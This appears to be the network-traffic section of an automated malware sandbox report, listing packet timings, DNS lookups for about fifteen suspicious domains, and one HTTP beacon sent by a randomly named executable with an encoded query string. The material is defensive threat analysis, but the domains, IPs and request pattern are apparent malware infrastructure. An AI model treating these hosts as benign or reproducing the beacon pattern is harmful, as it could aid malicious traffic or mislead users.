                                      Sep 22, 2024 17:38:37.118288040 CEST8049758208.91.197.27192.168.2.12
                                      Sep 22, 2024 17:38:37.118308067 CEST8049758208.91.197.27192.168.2.12
                                      Sep 22, 2024 17:38:37.118318081 CEST8049758208.91.197.27192.168.2.12
                                      Sep 22, 2024 17:38:37.118328094 CEST8049758208.91.197.27192.168.2.12
                                      Sep 22, 2024 17:38:37.118333101 CEST8049758208.91.197.27192.168.2.12
                                      Sep 22, 2024 17:38:37.118339062 CEST8049758208.91.197.27192.168.2.12
                                      Sep 22, 2024 17:38:37.118349075 CEST4975880192.168.2.12208.91.197.27
                                      Sep 22, 2024 17:38:37.118351936 CEST8049758208.91.197.27192.168.2.12
                                      Sep 22, 2024 17:38:37.118366003 CEST8049758208.91.197.27192.168.2.12
                                      Sep 22, 2024 17:38:37.118376970 CEST8049758208.91.197.27192.168.2.12
                                      Sep 22, 2024 17:38:37.118386984 CEST4975880192.168.2.12208.91.197.27
                                      Sep 22, 2024 17:38:37.118390083 CEST8049758208.91.197.27192.168.2.12
                                      Sep 22, 2024 17:38:37.118411064 CEST4975880192.168.2.12208.91.197.27
                                      Sep 22, 2024 17:38:37.118411064 CEST4975880192.168.2.12208.91.197.27
                                      Sep 22, 2024 17:38:37.118716955 CEST8049758208.91.197.27192.168.2.12
                                      Sep 22, 2024 17:38:37.118727922 CEST8049758208.91.197.27192.168.2.12
                                      Sep 22, 2024 17:38:37.118738890 CEST8049758208.91.197.27192.168.2.12
                                      Sep 22, 2024 17:38:37.118752956 CEST8049758208.91.197.27192.168.2.12
                                      Sep 22, 2024 17:38:37.120099068 CEST8049758208.91.197.27192.168.2.12
                                      Sep 22, 2024 17:38:37.120112896 CEST8049758208.91.197.27192.168.2.12
                                      Sep 22, 2024 17:38:37.120122910 CEST4975880192.168.2.12208.91.197.27
                                      Sep 22, 2024 17:38:37.121675968 CEST4975880192.168.2.12208.91.197.27
                                      Sep 22, 2024 17:38:37.123184919 CEST8049758208.91.197.27192.168.2.12
                                      Sep 22, 2024 17:38:37.127758026 CEST4975880192.168.2.12208.91.197.27
                                      Sep 22, 2024 17:38:37.209847927 CEST8049758208.91.197.27192.168.2.12
                                      Sep 22, 2024 17:38:37.209865093 CEST8049758208.91.197.27192.168.2.12
                                      Sep 22, 2024 17:38:37.209881067 CEST8049758208.91.197.27192.168.2.12
                                      Sep 22, 2024 17:38:37.210071087 CEST4975880192.168.2.12208.91.197.27
                                      Sep 22, 2024 17:38:37.210072041 CEST4975880192.168.2.12208.91.197.27
                                      Sep 22, 2024 17:38:37.214515924 CEST4975880192.168.2.12208.91.197.27
                                      Sep 22, 2024 17:38:37.231462002 CEST8049758208.91.197.27192.168.2.12
                                      Sep 22, 2024 17:38:42.265367031 CEST4975980192.168.2.12156.226.22.233
                                      Sep 22, 2024 17:38:42.270664930 CEST8049759156.226.22.233192.168.2.12
                                      Sep 22, 2024 17:38:42.270869970 CEST4975980192.168.2.12156.226.22.233
                                      Sep 22, 2024 17:38:42.285085917 CEST4975980192.168.2.12156.226.22.233
                                      Sep 22, 2024 17:38:42.293725967 CEST8049759156.226.22.233192.168.2.12
                                      Sep 22, 2024 17:38:43.198468924 CEST8049759156.226.22.233192.168.2.12
                                      Sep 22, 2024 17:38:43.199929953 CEST8049759156.226.22.233192.168.2.12
                                      Sep 22, 2024 17:38:43.199997902 CEST4975980192.168.2.12156.226.22.233
                                      Sep 22, 2024 17:38:43.793790102 CEST4975980192.168.2.12156.226.22.233
                                      Sep 22, 2024 17:38:44.812354088 CEST4976080192.168.2.12156.226.22.233
                                      Sep 22, 2024 17:38:44.817492008 CEST8049760156.226.22.233192.168.2.12
                                      Sep 22, 2024 17:38:44.817698002 CEST4976080192.168.2.12156.226.22.233
                                      Sep 22, 2024 17:38:44.829607964 CEST4976080192.168.2.12156.226.22.233
                                      Sep 22, 2024 17:38:44.834759951 CEST8049760156.226.22.233192.168.2.12
                                      Sep 22, 2024 17:38:45.752445936 CEST8049760156.226.22.233192.168.2.12
                                      Sep 22, 2024 17:38:45.752832890 CEST8049760156.226.22.233192.168.2.12
                                      Sep 22, 2024 17:38:45.752877951 CEST4976080192.168.2.12156.226.22.233
                                      Sep 22, 2024 17:38:46.340858936 CEST4976080192.168.2.12156.226.22.233
                                      Sep 22, 2024 17:38:47.361555099 CEST4976180192.168.2.12156.226.22.233
                                      Sep 22, 2024 17:38:47.396193981 CEST8049761156.226.22.233192.168.2.12
                                      Sep 22, 2024 17:38:47.396420956 CEST4976180192.168.2.12156.226.22.233
                                      Sep 22, 2024 17:38:47.409567118 CEST4976180192.168.2.12156.226.22.233
                                      Sep 22, 2024 17:38:47.496862888 CEST4976180192.168.2.12156.226.22.233
                                      Sep 22, 2024 17:38:47.768135071 CEST8049761156.226.22.233192.168.2.12
                                      Sep 22, 2024 17:38:47.768462896 CEST8049761156.226.22.233192.168.2.12
                                      Sep 22, 2024 17:38:47.768475056 CEST8049761156.226.22.233192.168.2.12
                                      Sep 22, 2024 17:38:48.778551102 CEST8049761156.226.22.233192.168.2.12
                                      Sep 22, 2024 17:38:48.778593063 CEST8049761156.226.22.233192.168.2.12
                                      Sep 22, 2024 17:38:48.779505014 CEST4976180192.168.2.12156.226.22.233
                                      Sep 22, 2024 17:38:48.918755054 CEST4976180192.168.2.12156.226.22.233
                                      Sep 22, 2024 17:38:49.939295053 CEST4976280192.168.2.12156.226.22.233
                                      Sep 22, 2024 17:38:49.957551956 CEST8049762156.226.22.233192.168.2.12
                                      Sep 22, 2024 17:38:49.957659006 CEST4976280192.168.2.12156.226.22.233
                                      Sep 22, 2024 17:38:49.967986107 CEST4976280192.168.2.12156.226.22.233
                                      Sep 22, 2024 17:38:49.976087093 CEST8049762156.226.22.233192.168.2.12
                                      Sep 22, 2024 17:38:50.988328934 CEST8049762156.226.22.233192.168.2.12
                                      Sep 22, 2024 17:38:50.991774082 CEST8049762156.226.22.233192.168.2.12
                                      Sep 22, 2024 17:38:50.995646954 CEST4976280192.168.2.12156.226.22.233
                                      Sep 22, 2024 17:38:51.035619974 CEST4976280192.168.2.12156.226.22.233
                                      Sep 22, 2024 17:38:51.051181078 CEST8049762156.226.22.233192.168.2.12
                                      Sep 22, 2024 17:38:56.236881018 CEST4976380192.168.2.12206.119.82.172
                                      Sep 22, 2024 17:38:56.241919041 CEST8049763206.119.82.172192.168.2.12
                                      Sep 22, 2024 17:38:56.241991043 CEST4976380192.168.2.12206.119.82.172
                                      Sep 22, 2024 17:38:56.252382040 CEST4976380192.168.2.12206.119.82.172
                                      Sep 22, 2024 17:38:56.258379936 CEST8049763206.119.82.172192.168.2.12
                                      Sep 22, 2024 17:38:57.151693106 CEST8049763206.119.82.172192.168.2.12
                                      Sep 22, 2024 17:38:57.151725054 CEST8049763206.119.82.172192.168.2.12
                                      Sep 22, 2024 17:38:57.155807018 CEST4976380192.168.2.12206.119.82.172
                                      Sep 22, 2024 17:38:57.762526035 CEST4976380192.168.2.12206.119.82.172
                                      Sep 22, 2024 17:38:58.785578012 CEST4976480192.168.2.12206.119.82.172
                                      Sep 22, 2024 17:38:58.791238070 CEST8049764206.119.82.172192.168.2.12
                                      Sep 22, 2024 17:38:58.791701078 CEST4976480192.168.2.12206.119.82.172
                                      Sep 22, 2024 17:38:58.802130938 CEST4976480192.168.2.12206.119.82.172
                                      Sep 22, 2024 17:38:58.806997061 CEST8049764206.119.82.172192.168.2.12
                                      Sep 22, 2024 17:38:59.711231947 CEST8049764206.119.82.172192.168.2.12
                                      Sep 22, 2024 17:38:59.711627007 CEST8049764206.119.82.172192.168.2.12
                                      Sep 22, 2024 17:38:59.711683035 CEST4976480192.168.2.12206.119.82.172
                                      Sep 22, 2024 17:39:00.309443951 CEST4976480192.168.2.12206.119.82.172
                                      Sep 22, 2024 17:39:01.328391075 CEST4976580192.168.2.12206.119.82.172
                                      Sep 22, 2024 17:39:01.353744984 CEST8049765206.119.82.172192.168.2.12
                                      Sep 22, 2024 17:39:01.353847980 CEST4976580192.168.2.12206.119.82.172
                                      Sep 22, 2024 17:39:01.379602909 CEST4976580192.168.2.12206.119.82.172
                                      Sep 22, 2024 17:39:01.386641979 CEST8049765206.119.82.172192.168.2.12
                                      Sep 22, 2024 17:39:01.387516022 CEST8049765206.119.82.172192.168.2.12
                                      Sep 22, 2024 17:39:02.566932917 CEST8049765206.119.82.172192.168.2.12
                                      Sep 22, 2024 17:39:02.575031042 CEST8049765206.119.82.172192.168.2.12
                                      Sep 22, 2024 17:39:02.576894999 CEST4976580192.168.2.12206.119.82.172
                                      Sep 22, 2024 17:39:02.888377905 CEST4976580192.168.2.12206.119.82.172
                                      Sep 22, 2024 17:39:03.949040890 CEST4976680192.168.2.12206.119.82.172
                                      Sep 22, 2024 17:39:03.971703053 CEST8049766206.119.82.172192.168.2.12
                                      Sep 22, 2024 17:39:03.971808910 CEST4976680192.168.2.12206.119.82.172
                                      Sep 22, 2024 17:39:04.009948015 CEST4976680192.168.2.12206.119.82.172
                                      Sep 22, 2024 17:39:04.016566992 CEST8049766206.119.82.172192.168.2.12
                                      Sep 22, 2024 17:39:04.940844059 CEST8049766206.119.82.172192.168.2.12
                                      Sep 22, 2024 17:39:04.941035032 CEST8049766206.119.82.172192.168.2.12
                                      Sep 22, 2024 17:39:04.941344023 CEST4976680192.168.2.12206.119.82.172
                                      Sep 22, 2024 17:39:04.945588112 CEST4976680192.168.2.12206.119.82.172
                                      Sep 22, 2024 17:39:04.964056015 CEST8049766206.119.82.172192.168.2.12
                                      Sep 22, 2024 17:39:10.067898989 CEST4976780192.168.2.12194.58.112.174
                                      Sep 22, 2024 17:39:10.072825909 CEST8049767194.58.112.174192.168.2.12
                                      Sep 22, 2024 17:39:10.072918892 CEST4976780192.168.2.12194.58.112.174
                                      Sep 22, 2024 17:39:10.154851913 CEST4976780192.168.2.12194.58.112.174
                                      Sep 22, 2024 17:39:10.159786940 CEST8049767194.58.112.174192.168.2.12
                                      Sep 22, 2024 17:39:11.129158974 CEST8049767194.58.112.174192.168.2.12
                                      Sep 22, 2024 17:39:11.129206896 CEST8049767194.58.112.174192.168.2.12
                                      Sep 22, 2024 17:39:11.129241943 CEST8049767194.58.112.174192.168.2.12
                                      Sep 22, 2024 17:39:11.129275084 CEST8049767194.58.112.174192.168.2.12
                                      Sep 22, 2024 17:39:11.129307985 CEST8049767194.58.112.174192.168.2.12
                                      Sep 22, 2024 17:39:11.129336119 CEST8049767194.58.112.174192.168.2.12
                                      Sep 22, 2024 17:39:11.129337072 CEST4976780192.168.2.12194.58.112.174
                                      Sep 22, 2024 17:39:11.129421949 CEST4976780192.168.2.12194.58.112.174
                                      Sep 22, 2024 17:39:11.129421949 CEST4976780192.168.2.12194.58.112.174
                                      Sep 22, 2024 17:39:11.129623890 CEST8049767194.58.112.174192.168.2.12
                                      Sep 22, 2024 17:39:11.129821062 CEST4976780192.168.2.12194.58.112.174
                                      Sep 22, 2024 17:39:11.669049025 CEST4976780192.168.2.12194.58.112.174
                                      Sep 22, 2024 17:39:12.735749006 CEST4976880192.168.2.12194.58.112.174
                                      Sep 22, 2024 17:39:12.755235910 CEST8049768194.58.112.174192.168.2.12
                                      Sep 22, 2024 17:39:12.761683941 CEST4976880192.168.2.12194.58.112.174
                                      Sep 22, 2024 17:39:12.789741039 CEST4976880192.168.2.12194.58.112.174
                                      Sep 22, 2024 17:39:12.795121908 CEST8049768194.58.112.174192.168.2.12
                                      Sep 22, 2024 17:39:13.648787975 CEST8049768194.58.112.174192.168.2.12
                                      Sep 22, 2024 17:39:13.648842096 CEST8049768194.58.112.174192.168.2.12
                                      Sep 22, 2024 17:39:13.648880959 CEST8049768194.58.112.174192.168.2.12
                                      Sep 22, 2024 17:39:13.648943901 CEST4976880192.168.2.12194.58.112.174
                                      Sep 22, 2024 17:39:13.648984909 CEST8049768194.58.112.174192.168.2.12
                                      Sep 22, 2024 17:39:13.649020910 CEST8049768194.58.112.174192.168.2.12
                                      Sep 22, 2024 17:39:13.649049044 CEST4976880192.168.2.12194.58.112.174
                                      Sep 22, 2024 17:39:13.649050951 CEST8049768194.58.112.174192.168.2.12
                                      Sep 22, 2024 17:39:13.649075985 CEST4976880192.168.2.12194.58.112.174
                                      Sep 22, 2024 17:39:13.649101019 CEST4976880192.168.2.12194.58.112.174
                                      Sep 22, 2024 17:39:14.295806885 CEST4976880192.168.2.12194.58.112.174
                                      Sep 22, 2024 17:39:15.327622890 CEST4976980192.168.2.12194.58.112.174
                                      Sep 22, 2024 17:39:15.891469955 CEST8049769194.58.112.174192.168.2.12
                                      Sep 22, 2024 17:39:15.891644001 CEST4976980192.168.2.12194.58.112.174
                                      Sep 22, 2024 17:39:16.167314053 CEST4976980192.168.2.12194.58.112.174
                                      Sep 22, 2024 17:39:16.172430038 CEST8049769194.58.112.174192.168.2.12
                                      Sep 22, 2024 17:39:16.172686100 CEST8049769194.58.112.174192.168.2.12
                                      Sep 22, 2024 17:39:16.625226021 CEST8049769194.58.112.174192.168.2.12
                                      Sep 22, 2024 17:39:16.625276089 CEST8049769194.58.112.174192.168.2.12
                                      Sep 22, 2024 17:39:16.625315905 CEST8049769194.58.112.174192.168.2.12
                                      Sep 22, 2024 17:39:16.625364065 CEST4976980192.168.2.12194.58.112.174
                                      Sep 22, 2024 17:39:16.626461029 CEST8049769194.58.112.174192.168.2.12
                                      Sep 22, 2024 17:39:16.628638983 CEST4976980192.168.2.12194.58.112.174
                                      Sep 22, 2024 17:39:16.743771076 CEST8049769194.58.112.174192.168.2.12
                                      Sep 22, 2024 17:39:16.745687962 CEST4976980192.168.2.12194.58.112.174
                                      Sep 22, 2024 17:39:17.684467077 CEST4976980192.168.2.12194.58.112.174
                                      Sep 22, 2024 17:39:20.017896891 CEST4977080192.168.2.12194.58.112.174
                                      Sep 22, 2024 17:39:20.023061037 CEST8049770194.58.112.174192.168.2.12
                                      Sep 22, 2024 17:39:20.023169994 CEST4977080192.168.2.12194.58.112.174
                                      Sep 22, 2024 17:39:20.035317898 CEST4977080192.168.2.12194.58.112.174
                                      Sep 22, 2024 17:39:20.040623903 CEST8049770194.58.112.174192.168.2.12
                                      Sep 22, 2024 17:39:20.724322081 CEST8049770194.58.112.174192.168.2.12
                                      Sep 22, 2024 17:39:20.724380016 CEST8049770194.58.112.174192.168.2.12
                                      Sep 22, 2024 17:39:20.724641085 CEST4977080192.168.2.12194.58.112.174
                                      Sep 22, 2024 17:39:20.724677086 CEST8049770194.58.112.174192.168.2.12
                                      Sep 22, 2024 17:39:20.724709034 CEST8049770194.58.112.174192.168.2.12
                                      Sep 22, 2024 17:39:20.724987984 CEST8049770194.58.112.174192.168.2.12
                                      Sep 22, 2024 17:39:20.725146055 CEST4977080192.168.2.12194.58.112.174
                                      Sep 22, 2024 17:39:20.725213051 CEST8049770194.58.112.174192.168.2.12
                                      Sep 22, 2024 17:39:20.725251913 CEST8049770194.58.112.174192.168.2.12
                                      Sep 22, 2024 17:39:20.725286961 CEST8049770194.58.112.174192.168.2.12
                                      Sep 22, 2024 17:39:20.725294113 CEST4977080192.168.2.12194.58.112.174
                                      Sep 22, 2024 17:39:20.725322008 CEST8049770194.58.112.174192.168.2.12
                                      Sep 22, 2024 17:39:20.725358009 CEST8049770194.58.112.174192.168.2.12
                                      Sep 22, 2024 17:39:20.725402117 CEST4977080192.168.2.12194.58.112.174
                                      Sep 22, 2024 17:39:20.725416899 CEST4977080192.168.2.12194.58.112.174
                                      Sep 22, 2024 17:39:20.731125116 CEST8049770194.58.112.174192.168.2.12
                                      Sep 22, 2024 17:39:20.731461048 CEST8049770194.58.112.174192.168.2.12
                                      Sep 22, 2024 17:39:20.731668949 CEST4977080192.168.2.12194.58.112.174
                                      Sep 22, 2024 17:39:20.735368013 CEST4977080192.168.2.12194.58.112.174
                                      Sep 22, 2024 17:39:20.741759062 CEST8049770194.58.112.174192.168.2.12
                                      TimestampSource PortDest PortSource IPDest IP
                                      Sep 22, 2024 17:36:00.828464031 CEST5117953192.168.2.121.1.1.1
                                      Sep 22, 2024 17:36:00.880367994 CEST53511791.1.1.1192.168.2.12
                                      Sep 22, 2024 17:36:16.422336102 CEST5369953192.168.2.121.1.1.1
                                      Sep 22, 2024 17:36:16.485008955 CEST53536991.1.1.1192.168.2.12
                                      Sep 22, 2024 17:36:29.672642946 CEST6028953192.168.2.121.1.1.1
                                      Sep 22, 2024 17:36:29.688025951 CEST53602891.1.1.1192.168.2.12
                                      Sep 22, 2024 17:36:43.516344070 CEST5197753192.168.2.121.1.1.1
                                      Sep 22, 2024 17:36:43.732629061 CEST53519771.1.1.1192.168.2.12
                                      Sep 22, 2024 17:36:57.111366034 CEST4923153192.168.2.121.1.1.1
                                      Sep 22, 2024 17:36:57.291618109 CEST53492311.1.1.1192.168.2.12
                                      Sep 22, 2024 17:37:11.845594883 CEST5580453192.168.2.121.1.1.1
                                      Sep 22, 2024 17:37:12.036957026 CEST53558041.1.1.1192.168.2.12
                                      Sep 22, 2024 17:37:26.000989914 CEST6476853192.168.2.121.1.1.1
                                      Sep 22, 2024 17:37:26.051600933 CEST53647681.1.1.1192.168.2.12
                                      Sep 22, 2024 17:37:39.407757998 CEST5934453192.168.2.121.1.1.1
                                      Sep 22, 2024 17:37:39.666762114 CEST53593441.1.1.1192.168.2.12
                                      Sep 22, 2024 17:37:52.877513885 CEST6344353192.168.2.121.1.1.1
                                      Sep 22, 2024 17:37:53.120959997 CEST53634431.1.1.1192.168.2.12
                                      Sep 22, 2024 17:38:06.328883886 CEST5227853192.168.2.121.1.1.1
                                      Sep 22, 2024 17:38:06.342612982 CEST53522781.1.1.1192.168.2.12
                                      Sep 22, 2024 17:38:19.720128059 CEST6170153192.168.2.121.1.1.1
                                      Sep 22, 2024 17:38:19.753065109 CEST53617011.1.1.1192.168.2.12
                                      Sep 22, 2024 17:38:27.814065933 CEST5696653192.168.2.121.1.1.1
                                      Sep 22, 2024 17:38:27.943881989 CEST53569661.1.1.1192.168.2.12
                                      Sep 22, 2024 17:38:42.220643044 CEST5207653192.168.2.121.1.1.1
                                      Sep 22, 2024 17:38:42.262717962 CEST53520761.1.1.1192.168.2.12
                                      Sep 22, 2024 17:38:56.049129963 CEST5002353192.168.2.121.1.1.1
                                      Sep 22, 2024 17:38:56.234266996 CEST53500231.1.1.1192.168.2.12
                                      Sep 22, 2024 17:39:09.969295979 CEST5204353192.168.2.121.1.1.1
                                      Sep 22, 2024 17:39:10.063880920 CEST53520431.1.1.1192.168.2.12
                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                      Sep 22, 2024 17:36:00.828464031 CEST192.168.2.121.1.1.10x7286Standard query (0)www.unfazedtv.liveA (IP address)IN (0x0001)false
                                      Sep 22, 2024 17:36:16.422336102 CEST192.168.2.121.1.1.10x7322Standard query (0)www.pakmartcentral.shopA (IP address)IN (0x0001)false
                                      Sep 22, 2024 17:36:29.672642946 CEST192.168.2.121.1.1.10x3d17Standard query (0)www.aposentandolegal.comA (IP address)IN (0x0001)false
                                      Sep 22, 2024 17:36:43.516344070 CEST192.168.2.121.1.1.10x9c81Standard query (0)www.vpnboo.onlineA (IP address)IN (0x0001)false
                                      Sep 22, 2024 17:36:57.111366034 CEST192.168.2.121.1.1.10x8491Standard query (0)www.quantis.lifeA (IP address)IN (0x0001)false
                                      Sep 22, 2024 17:37:11.845594883 CEST192.168.2.121.1.1.10x4170Standard query (0)www.nng65.topA (IP address)IN (0x0001)false
                                      Sep 22, 2024 17:37:26.000989914 CEST192.168.2.121.1.1.10xc750Standard query (0)www.ultraleap.netA (IP address)IN (0x0001)false
                                      Sep 22, 2024 17:37:39.407757998 CEST192.168.2.121.1.1.10xe00eStandard query (0)www.tonesandtribes.shopA (IP address)IN (0x0001)false
                                      Sep 22, 2024 17:37:52.877513885 CEST192.168.2.121.1.1.10x9f9dStandard query (0)www.dhkatp.vipA (IP address)IN (0x0001)false
                                      Sep 22, 2024 17:38:06.328883886 CEST192.168.2.121.1.1.10x5e04Standard query (0)www.new-wellness.netA (IP address)IN (0x0001)false
                                      Sep 22, 2024 17:38:19.720128059 CEST192.168.2.121.1.1.10xac6Standard query (0)www.gerakankoreri.netA (IP address)IN (0x0001)false
                                      Sep 22, 2024 17:38:27.814065933 CEST192.168.2.121.1.1.10x221aStandard query (0)www.yourhomecopilot.onlineA (IP address)IN (0x0001)false
                                      Sep 22, 2024 17:38:42.220643044 CEST192.168.2.121.1.1.10x2892Standard query (0)www.nad5.shopA (IP address)IN (0x0001)false
                                      Sep 22, 2024 17:38:56.049129963 CEST192.168.2.121.1.1.10xe6e7Standard query (0)www.d97fw.topA (IP address)IN (0x0001)false
                                      Sep 22, 2024 17:39:09.969295979 CEST192.168.2.121.1.1.10xaeaaStandard query (0)www.albero-dveri.onlineA (IP address)IN (0x0001)false
                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                      Sep 22, 2024 17:36:00.880367994 CEST1.1.1.1192.168.2.120x7286No error (0)www.unfazedtv.live94950.bodis.comCNAME (Canonical name)IN (0x0001)false
                                      Sep 22, 2024 17:36:00.880367994 CEST1.1.1.1192.168.2.120x7286No error (0)94950.bodis.com199.59.243.227A (IP address)IN (0x0001)false
                                      Sep 22, 2024 17:36:16.485008955 CEST1.1.1.1192.168.2.120x7322No error (0)www.pakmartcentral.shoppakmartcentral.shopCNAME (Canonical name)IN (0x0001)false
                                      Sep 22, 2024 17:36:16.485008955 CEST1.1.1.1192.168.2.120x7322No error (0)pakmartcentral.shop84.32.84.32A (IP address)IN (0x0001)false
                                      Sep 22, 2024 17:36:29.688025951 CEST1.1.1.1192.168.2.120x3d17No error (0)www.aposentandolegal.comaposentandolegal.comCNAME (Canonical name)IN (0x0001)false
                                      Sep 22, 2024 17:36:29.688025951 CEST1.1.1.1192.168.2.120x3d17No error (0)aposentandolegal.com3.33.130.190A (IP address)IN (0x0001)false
                                      Sep 22, 2024 17:36:29.688025951 CEST1.1.1.1192.168.2.120x3d17No error (0)aposentandolegal.com15.197.148.33A (IP address)IN (0x0001)false
                                      Sep 22, 2024 17:36:43.732629061 CEST1.1.1.1192.168.2.120x9c81No error (0)www.vpnboo.online194.85.61.76A (IP address)IN (0x0001)false
                                      Sep 22, 2024 17:36:43.732629061 CEST1.1.1.1192.168.2.120x9c81No error (0)www.vpnboo.online109.70.26.37A (IP address)IN (0x0001)false
                                      Sep 22, 2024 17:36:57.291618109 CEST1.1.1.1192.168.2.120x8491No error (0)www.quantis.life162.0.238.246A (IP address)IN (0x0001)false
                                      Sep 22, 2024 17:37:12.036957026 CEST1.1.1.1192.168.2.120x4170No error (0)www.nng65.topnng65.topCNAME (Canonical name)IN (0x0001)false
                                      Sep 22, 2024 17:37:12.036957026 CEST1.1.1.1192.168.2.120x4170No error (0)nng65.top38.47.233.65A (IP address)IN (0x0001)false
                                      Sep 22, 2024 17:37:26.051600933 CEST1.1.1.1192.168.2.120xc750No error (0)www.ultraleap.netwebredir.vip.gandi.netCNAME (Canonical name)IN (0x0001)false
                                      Sep 22, 2024 17:37:26.051600933 CEST1.1.1.1192.168.2.120xc750No error (0)webredir.vip.gandi.net217.70.184.50A (IP address)IN (0x0001)false
                                      Sep 22, 2024 17:37:39.666762114 CEST1.1.1.1192.168.2.120xe00eNo error (0)www.tonesandtribes.shop52.223.13.41A (IP address)IN (0x0001)false
                                      Sep 22, 2024 17:37:53.120959997 CEST1.1.1.1192.168.2.120x9f9dNo error (0)www.dhkatp.vipdhkatp.vipCNAME (Canonical name)IN (0x0001)false
                                      Sep 22, 2024 17:37:53.120959997 CEST1.1.1.1192.168.2.120x9f9dNo error (0)dhkatp.vip3.33.130.190A (IP address)IN (0x0001)false
                                      Sep 22, 2024 17:37:53.120959997 CEST1.1.1.1192.168.2.120x9f9dNo error (0)dhkatp.vip15.197.148.33A (IP address)IN (0x0001)false
                                      Sep 22, 2024 17:38:06.342612982 CEST1.1.1.1192.168.2.120x5e04No error (0)www.new-wellness.net134.119.247.136A (IP address)IN (0x0001)false
                                      Sep 22, 2024 17:38:19.753065109 CEST1.1.1.1192.168.2.120xac6Server failure (2)www.gerakankoreri.netnonenoneA (IP address)IN (0x0001)false
                                      Sep 22, 2024 17:38:27.943881989 CEST1.1.1.1192.168.2.120x221aNo error (0)www.yourhomecopilot.online208.91.197.27A (IP address)IN (0x0001)false
                                      Sep 22, 2024 17:38:42.262717962 CEST1.1.1.1192.168.2.120x2892No error (0)www.nad5.shop156.226.22.233A (IP address)IN (0x0001)false
                                      Sep 22, 2024 17:38:56.234266996 CEST1.1.1.1192.168.2.120xe6e7No error (0)www.d97fw.topd97fw.topCNAME (Canonical name)IN (0x0001)false
                                      Sep 22, 2024 17:38:56.234266996 CEST1.1.1.1192.168.2.120xe6e7No error (0)d97fw.top206.119.82.172A (IP address)IN (0x0001)false
                                      Sep 22, 2024 17:39:10.063880920 CEST1.1.1.1192.168.2.120xaeaaNo error (0)www.albero-dveri.online194.58.112.174A (IP address)IN (0x0001)false
                                      • www.unfazedtv.live
                                      • www.pakmartcentral.shop
                                      • www.aposentandolegal.com
                                      • www.vpnboo.online
                                      • www.quantis.life
                                      • www.nng65.top
                                      • www.ultraleap.net
                                      • www.tonesandtribes.shop
                                      • www.dhkatp.vip
                                      • www.new-wellness.net
                                      • www.yourhomecopilot.online
                                      • www.nad5.shop
                                      • www.d97fw.top
                                      • www.albero-dveri.online
                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      0192.168.2.1249717199.59.243.227804544C:\Program Files (x86)\ZhlQzquTajtiLqBCvLYgtCIsdoMHzHtZZfoyvPLwCpFnxVRoEgfIfUXGJnCCgDHbImlRaAz\dgGgsACWgP.exe
                                      TimestampBytes transferredDirectionData
                                      Sep 22, 2024 17:36:00.902777910 CEST556OUTGET /6vaz/?Bz=dVmT&H2y4Q2Q8=LgoeL6qgo6xxr1EFrztEZdx+E/+1tytDLt8ibzyxUeJmcR9hA6rXNwb8WOqwQ6QehWK82jCTordIq8Khn9B3BWsFCXvHkzTnCgqWXit0BdDbSBQp26/GsKo= HTTP/1.1
                                      Host: www.unfazedtv.live
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                      Accept-Language: en-US,en;q=0.9
                                      Connection: close
                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; Lenovo A5000 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Mobile Safari/537.36 [Pinterest/Android]
                                      Sep 22, 2024 17:36:01.381788015 CEST1236INHTTP/1.1 200 OK
                                      date: Sun, 22 Sep 2024 15:36:00 GMT
                                      content-type: text/html; charset=utf-8
                                      content-length: 1450
                                      x-request-id: 3f286696-225d-41e9-904e-b9e32bb233bc
                                      cache-control: no-store, max-age=0
                                      accept-ch: sec-ch-prefers-color-scheme
                                      critical-ch: sec-ch-prefers-color-scheme
                                      vary: sec-ch-prefers-color-scheme
                                      x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_E4KFXlk2WU9szBj1IF15PgJ+Y+XxnFUTZGm7MLkMvSH+hdObrnIUW/GtVvJvYAkDw3ynrF5alIezhoJrt2SWBg==
                                      set-cookie: parking_session=3f286696-225d-41e9-904e-b9e32bb233bc; expires=Sun, 22 Sep 2024 15:51:01 GMT; path=/
                                      connection: close
                                      Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 45 34 4b 46 58 6c 6b 32 57 55 39 73 7a 42 6a 31 49 46 31 35 50 67 4a 2b 59 2b 58 78 6e 46 55 54 5a 47 6d 37 4d 4c 6b 4d 76 53 48 2b 68 64 4f 62 72 6e 49 55 57 2f 47 74 56 76 4a 76 59 41 6b 44 77 33 79 6e 72 46 35 61 6c 49 65 7a 68 6f 4a 72 74 32 53 57 42 67 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
